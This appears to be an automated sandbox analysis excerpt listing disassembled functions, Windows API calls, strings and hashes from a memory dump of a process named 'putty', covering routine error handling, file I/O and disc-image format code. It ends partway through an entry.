Opcode Fuzzy Hash: 4537afe9affa856c083f79a8bef99c34e2443e0fb1d52d778356f65946f25f80
Instruction Fuzzy Hash: 7921B575A006459FC729CF5AE891E6AB7E5EB88700F14892DF945EF780DB31B904CB81

Function 00323710 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(D747BB9A), ref: 00323739

Part of subcall function 00323570: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,00000000,00000001,00000000,D747BB9A,00000000), ref: 003235F9
Part of subcall function 00323570: LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00323634

Part of subcall function 00323180: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,D747BB9A,00000000,00000000,00000000,?,?,003DA563,000000FF), ref: 003231E9
Part of subcall function 00323180: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,003DA563,000000FF,?,003236F4), ref: 00323235

__CxxThrowException@8.LIBCMT ref: 00323774

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

__CxxThrowException@8.LIBCMT ref: 003237E0

Strings

internal error in %s at line %d., xrefs: 003237B5

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ByteCharException@8MultiThrowWide$ErrorExceptionFormatFreeLastLocalMessageRaise
String ID: internal error in %s at line %d.
API String ID: 3048786930-1263206410
Opcode ID: 838ae09316d152914f129a446603921a7c37594460fa8adb2085b0e5b7cd056a
Instruction ID: d0060a1304aa3864b87cc446e34eb48c0825895e30bf03c37c2f64e922efade7
Opcode Fuzzy Hash: 838ae09316d152914f129a446603921a7c37594460fa8adb2085b0e5b7cd056a
Instruction Fuzzy Hash: 6B118CB6418744BBC305EB64DC46FCB77ACAB88720F004B29F565962C0EB74E6088B96

Function 00322560 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00322593

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

SetFilePointer.KERNEL32(?,?,?,00000001), ref: 003225C4
GetLastError.KERNEL32(?,?,?,00000001), ref: 003225D2

Part of subcall function 003230A0: lstrlenW.KERNEL32(?,D747BB9A,?,?,?,Cannot close previously open file handle.), ref: 003230F4
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 00323114
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 0032315B

Strings

file not yet opened., xrefs: 0032257B

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorExceptionException@8FileLastPointerRaiseThrowlstrlen
String ID: file not yet opened.
API String ID: 148919606-3828849416
Opcode ID: 8ba9c70d0869220bfca72ffa652c83c5edde02f1a3f859e70276b5c2eede86b8
Instruction ID: e4b57c20b5136dfab8c877efcece9c7f28850ef04403269ae8f13b11ad6f2f1b
Opcode Fuzzy Hash: 8ba9c70d0869220bfca72ffa652c83c5edde02f1a3f859e70276b5c2eede86b8
Instruction Fuzzy Hash: 49117030604715ABC701EF38EC55B6FB3A9EB99710FA08A19F9658B2D0E770DD408692

Function 00330A30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00330A56

Strings

BEA01, xrefs: 00330A5B
NSR02, xrefs: 00330A8F
TEA01, xrefs: 00330AB6

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset
String ID: BEA01$NSR02$TEA01
API String ID: 2102423945-1066453280
Opcode ID: ea4bc3894328805ad7d8adb9a0048da77696cf929407b0396d9c09f20fa88203
Instruction ID: 1f1902fa0e9c1cfe684f832fa84a2c9e2b0c825c13ca540dd81d3f0319ee0d84
Opcode Fuzzy Hash: ea4bc3894328805ad7d8adb9a0048da77696cf929407b0396d9c09f20fa88203
Instruction Fuzzy Hash: E51157742483809FD355DB28D891A6AFBD9AB89700F04C95DF9D88B3D1DA70D918CBD3

Function 00330810 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00330820
_memset.LIBCMT ref: 00330830

Strings

OSTA Compressed Unicode, xrefs: 00330840
*OSTA UDF Compliant, xrefs: 00330894

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset
String ID: *OSTA UDF Compliant$OSTA Compressed Unicode
API String ID: 2102423945-2309661426
Opcode ID: db2c0048b4ba1f65bc53ade8aa845e1c53647e1ced5de0a72299181496b22aa4
Instruction ID: 6231fa09b3609607fbbd674362fe9bbffc1264e66146c7de36e411f638e12b1d
Opcode Fuzzy Hash: db2c0048b4ba1f65bc53ade8aa845e1c53647e1ced5de0a72299181496b22aa4
Instruction Fuzzy Hash: 052109B49542419ECB51CF68D480BE63BE6BF58304F4844BA9E5CDF29BE7701104CB6D

Function 00330690 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0033069D
_memset.LIBCMT ref: 003306CA
_memset.LIBCMT ref: 003306EF

Part of subcall function 00330550: _rand.LIBCMT ref: 003305A0
Part of subcall function 00330550: _memset.LIBCMT ref: 003305C5

Strings

OSTA Compressed Unicode, xrefs: 003306DA, 003306FF

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset$_rand
String ID: OSTA Compressed Unicode
API String ID: 3289902143-837361256
Opcode ID: f2b1873a984b63f942cf25d9aa3b1a2d15a8ee109985b7d4f2520442d1e0e959
Instruction ID: 817421cce032fc1d3f2b45574b34cf0bec05fe1e043f36aab49a6e92afd8e603
Opcode Fuzzy Hash: f2b1873a984b63f942cf25d9aa3b1a2d15a8ee109985b7d4f2520442d1e0e959
Instruction Fuzzy Hash: 4001DB3565430056E702EA608CC2BCB339A9F89300F854874FF487F1C2DEA52605C7E5

Function 00343F90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 003B964E: _malloc.LIBCMT ref: 003B9668

std::exception::exception.LIBCMT ref: 00343FDC
__CxxThrowException@8.LIBCMT ref: 00343FF1

Strings

y<4, xrefs: 00343FD6, 00343FE6, 00343FE9
0123456789ABCDEF, xrefs: 003440A6, 003440D2

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0123456789ABCDEF$y<4
API String ID: 4063778783-2178684628
Opcode ID: 9a9e644a102396dff9e9c1e4127cdba032d2e436195e39b5b72df84e77d26e1e
Instruction ID: 4d1419f0fe33e88301a813e838e4f97fccf616a3ae92526bbe2f832afacb10f7
Opcode Fuzzy Hash: 9a9e644a102396dff9e9c1e4127cdba032d2e436195e39b5b72df84e77d26e1e
Instruction Fuzzy Hash: 4501F474900209DFC709DF54D9448AAB7F0FF58300B24C46EE91A4BB91EB71FA04CB91

Function 00342A40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00342A67

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

Strings

vector<T> too long, xrefs: 00342A62
gfff, xrefs: 00342A71
gfff, xrefs: 00342A49

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: gfff$gfff$vector<T> too long
API String ID: 2884196479-3369487235
Opcode ID: 39f0c2d3e9dfc1b8ee2686cc8bb6121c3918b1fa4b26ea15b37a7cd37c4ad7c9
Instruction ID: 434275651346881febbf39aca85169377457be7d174c20c5a609586b33171262
Opcode Fuzzy Hash: 39f0c2d3e9dfc1b8ee2686cc8bb6121c3918b1fa4b26ea15b37a7cd37c4ad7c9
Instruction Fuzzy Hash: 79F06D63B100610B8265943FBD0585BA98B9BD03143AAC631FD45FF289DC31FC428282

Function 00322600 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00322633

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

SetFilePointer.KERNEL32 ref: 00322652
GetLastError.KERNEL32 ref: 00322660

Part of subcall function 003230A0: lstrlenW.KERNEL32(?,D747BB9A,?,?,?,Cannot close previously open file handle.), ref: 003230F4
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 00323114
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 0032315B

Strings

file not yet opened., xrefs: 0032261B

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorExceptionException@8FileLastPointerRaiseThrowlstrlen
String ID: file not yet opened.
API String ID: 148919606-3828849416
Opcode ID: cfa01810a7c0531d4e95eeb7b40314f25e2108a31e26fa19f23cf0398391d2e5
Instruction ID: e7ce4306e5b36cecc6b470afa1260d9804caa17e129d773d1f307b4fa03d739b
Opcode Fuzzy Hash: cfa01810a7c0531d4e95eeb7b40314f25e2108a31e26fa19f23cf0398391d2e5
Instruction Fuzzy Hash: 60017C306453016BC301EF38EC4AB5F73E8AB48724F800A1DF6A59A2D0DBB0A904CB96

Function 00332320 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00332341
_memmove.LIBCMT ref: 0033237A

Strings

EL TORITO SPECIFICATION, xrefs: 0033235A
CD001, xrefs: 00332346

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmove_memset
String ID: CD001$EL TORITO SPECIFICATION
API String ID: 3555123492-3632950038
Opcode ID: a09aaaec7b370b5521ac8f1892bb777986031e3ef92cec71e06bb4fe45e2f0af
Instruction ID: bbf5d47079d55c6ade8a367c958b5aba81d122e0debd62788e159b6135fe7d1b
Opcode Fuzzy Hash: a09aaaec7b370b5521ac8f1892bb777986031e3ef92cec71e06bb4fe45e2f0af
Instruction Fuzzy Hash: 3E014C34A442589AD751DF64CC41B9ABBA8BB48300F4082E9AA886B281DE716A48CFD1

Function 0032E434 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0032E453

Part of subcall function 003B947D: std::exception::_Copy_str.LIBCMT ref: 003B9498

__CxxThrowException@8.LIBCMT ref: 0032E444

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

__CxxThrowException@8.LIBCMT ref: 0032E468

Strings

\-@, xrefs: 0032E45D, 0032E460

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
String ID: \-@
API String ID: 2939012366-3423671737
Opcode ID: e39dd372dfba61048209dddbd00b6194fcdf1de33849d81140d4aeab6b4ac607
Instruction ID: 7d8fcad8fe47b46aa20089a1ae10a4c6d31440c073616f0201a36bbac6eb119e
Opcode Fuzzy Hash: e39dd372dfba61048209dddbd00b6194fcdf1de33849d81140d4aeab6b4ac607
Instruction Fuzzy Hash: DDE04FB580030D6AC705EFE4C8C59DE3B7C9E08304F14581AB3053A581DA74A9488A71

Function 00324340 Relevance: 6.1, APIs: 4, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 00324377
FileTimeToSystemTime.KERNEL32(?,?), ref: 003243A5
FileTimeToSystemTime.KERNEL32(?,?), ref: 003243B5
FileTimeToSystemTime.KERNEL32(?,?), ref: 003243C5

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Time$File$System$Attributes
String ID:
API String ID: 1514610301-0
Opcode ID: 966ba7c018998310ac7d3a1b6101a740fdad8510653ba7cb298b45426c53cedb
Instruction ID: 4da1c298d529e19554edc6810b1a3a9298429c37a34af3c25f55c900f199e1c4
Opcode Fuzzy Hash: 966ba7c018998310ac7d3a1b6101a740fdad8510653ba7cb298b45426c53cedb
Instruction Fuzzy Hash: 15215E765043059BCB01EFA9E881DAFB3ECBBC8750F05491EFA5987140DA31E9148BA2

Function 00326330 Relevance: 6.1, APIs: 4, Instructions: 62synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00326341
SetEvent.KERNEL32(?), ref: 0032634B

Part of subcall function 00322D20: std::_Xinvalid_argument.LIBCPMT ref: 00322D36
Part of subcall function 00322D20: _memmove.LIBCMT ref: 00322D6F

Part of subcall function 00326150: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00326181
Part of subcall function 00326150: ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003261BF

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,000000FF), ref: 0032638A

Part of subcall function 00326150: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 003262F0

ReleaseMutex.KERNEL32(?,00000000,000000FF), ref: 003263B6

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: NamedPeekPipeWait$EventFileMultipleMutexObjectObjectsReadReleaseSingleXinvalid_argument_memmovestd::_
String ID:
API String ID: 3448161796-0
Opcode ID: 9ded303179c87785c4ae1f6a5412af4722c396dcdd5132ca257b7f3504652dd4
Instruction ID: 7c2f1d5858fab5c663a4f8b2e469c23c02a77d155367202f8fbe69f6130200f5
Opcode Fuzzy Hash: 9ded303179c87785c4ae1f6a5412af4722c396dcdd5132ca257b7f3504652dd4
Instruction Fuzzy Hash: D8114C35204615ABCB06DBA4EC56AA9B729BF84320F108305EA259B791DB30BC21DBD0

Function 00328F10 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00328F3F
std::exception::exception.LIBCMT ref: 00328F75

Part of subcall function 003B947D: std::exception::_Copy_str.LIBCMT ref: 003B9498

__CxxThrowException@8.LIBCMT ref: 00328F8A

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00328F91

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
